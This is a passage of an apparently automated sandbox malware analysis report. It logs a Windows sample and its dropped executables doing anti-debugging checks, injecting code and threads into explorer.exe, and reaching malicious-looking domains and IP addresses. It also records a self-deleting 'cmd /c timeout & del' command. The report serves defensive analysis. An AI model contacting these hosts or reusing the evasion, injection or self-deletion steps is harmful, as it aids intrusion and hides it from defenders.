                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeSystem information queried: ModuleInformation

                        Anti Debugging:

                        barindex
                        Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeSystem information queried: CodeIntegrityInformation
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeSystem information queried: CodeIntegrityInformation
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 1_2_00432E00 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00401000 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_0040C180 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00840083 push dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00BC092B mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00BC0D90 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 1_2_00425150 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 1_2_0041CAD7 GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 19_1_004027ED LdrLoadDll,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeMemory protected: page guard
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 1_2_00425150 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 1_2_0042C9C0 SetUnhandledExceptionFilter,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: 1_2_004286A0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 15_2_00424D20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 15_2_0042C590 SetUnhandledExceptionFilter,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: 15_2_00428270 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                        HIPS / PFW / Operating System Protection Evasion:

                        barindex
                        System process connects to network (likely due to code injection or exploit)Show sources
                        Source: C:\Windows\explorer.exeDomain query: bitbucket.org
                        Source: C:\Windows\explorer.exeDomain query: bbuseruploads.s3.amazonaws.com
                        Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                        Source: C:\Windows\explorer.exeDomain query: downloafilesaccess.ddns.net
                        Source: C:\Windows\explorer.exeDomain query: unicupload.top
                        Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                        Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                        Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                        Source: C:\Windows\explorer.exeDomain query: infinity-cheats.com
                        Source: C:\Windows\explorer.exeDomain query: transfer.sh
                        Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                        Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                        Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                        Benign windows process drops PE filesShow sources
                        Source: C:\Windows\explorer.exeFile created: 6BE6.exe.10.drJump to dropped file
                        Maps a DLL or memory area into another processShow sources
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                        Injects a PE file into a foreign processesShow sources
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeMemory written: C:\Users\user\AppData\Local\Temp\A3D.exe base: 400000 value starts with: 4D5A
                        Creates a thread in another existing process (thread injection)Show sources
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeThread created: C:\Windows\explorer.exe EIP: 4DE1930
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeThread created: unknown EIP: 5AA1930
                        .NET source code references suspicious native API functionsShow sources
                        Source: 8992.exe.10.dr, pcTrevOytiruceSegasseMledoMecivreSmetsyS82332.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 8992.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                        Source: BC9C.exe.10.dr, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: A3D.exe.10.dr, retropxEtcartnoCegasseMrezilaireStcartnoCataDnoitpircseDledoMecivreSmetsyS80716.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: A3D.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                        Source: 27.0.A3D.exe.710000.0.unpack, retropxEtcartnoCegasseMrezilaireStcartnoCataDnoitpircseDledoMecivreSmetsyS80716.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 27.0.A3D.exe.710000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                        Source: 27.2.A3D.exe.710000.0.unpack, retropxEtcartnoCegasseMrezilaireStcartnoCataDnoitpircseDledoMecivreSmetsyS80716.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 27.2.A3D.exe.710000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                        Source: 27.0.A3D.exe.710000.1.unpack, retropxEtcartnoCegasseMrezilaireStcartnoCataDnoitpircseDledoMecivreSmetsyS80716.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 27.0.A3D.exe.710000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                        Source: 27.0.A3D.exe.710000.2.unpack, retropxEtcartnoCegasseMrezilaireStcartnoCataDnoitpircseDledoMecivreSmetsyS80716.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 27.0.A3D.exe.710000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                        Source: 27.0.A3D.exe.710000.3.unpack, retropxEtcartnoCegasseMrezilaireStcartnoCataDnoitpircseDledoMecivreSmetsyS80716.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 27.0.A3D.exe.710000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                        Source: 39.0.A3D.exe.8f0000.13.unpack, retropxEtcartnoCegasseMrezilaireStcartnoCataDnoitpircseDledoMecivreSmetsyS80716.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 39.0.A3D.exe.8f0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                        Source: 39.0.A3D.exe.8f0000.0.unpack, retropxEtcartnoCegasseMrezilaireStcartnoCataDnoitpircseDledoMecivreSmetsyS80716.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 39.0.A3D.exe.8f0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                        Source: 39.0.A3D.exe.400000.4.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeProcess created: C:\Users\user\Desktop\4BfFNMA5mb.exe "C:\Users\user\Desktop\4BfFNMA5mb.exe"
                        Source: C:\Users\user\AppData\Roaming\jutawrsProcess created: C:\Users\user\AppData\Roaming\jutawrs C:\Users\user\AppData\Roaming\jutawrs
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeProcess created: C:\Users\user\AppData\Local\Temp\2AA1.exe C:\Users\user\AppData\Local\Temp\2AA1.exe
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\E936.exe" & exit
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeProcess created: C:\Users\user\AppData\Local\Temp\A3D.exe C:\Users\user\AppData\Local\Temp\A3D.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeCode function: 26_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                        Source: svchost.exe, 00000004.00000002.556312333.00000203CB590000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.300796987.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.335468041.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.319817763.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                        Source: explorer.exe, 0000000A.00000000.335052106.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.316771171.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.300535065.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
                        Source: svchost.exe, 00000004.00000002.556312333.00000203CB590000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.321837579.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.300796987.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.335468041.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.319817763.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: svchost.exe, 00000004.00000002.556312333.00000203CB590000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.300796987.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.335468041.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.319817763.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progman
                        Source: svchost.exe, 00000004.00000002.556312333.00000203CB590000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.300796987.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.335468041.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.319817763.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                        Source: explorer.exe, 0000000A.00000000.326910107.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.309014890.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.344397602.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: _strlen,EnumSystemLocalesA,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: ___getlocaleinfo,GetCPInfo,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,InterlockedDecrement,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,_strncpy_s,__invoke_watson_if_error,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: _GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,__invoke_watson_if_error,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: _LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,__strnicmp,_strlen,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_strlen,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                        Source: C:\Users\user\Desktop\4BfFNMA5mb.exeCode function: GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: _strlen,EnumSystemLocalesA,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: ___getlocaleinfo,GetCPInfo,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,InterlockedDecrement,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: _GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,__invoke_watson_if_error,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: _LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,__strnicmp,_strlen,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_strlen,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,_strncpy_s,__invoke_watson_if_error,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea,
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeCode function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A3D.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Users\user\AppData\Local\Temp\A3D.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
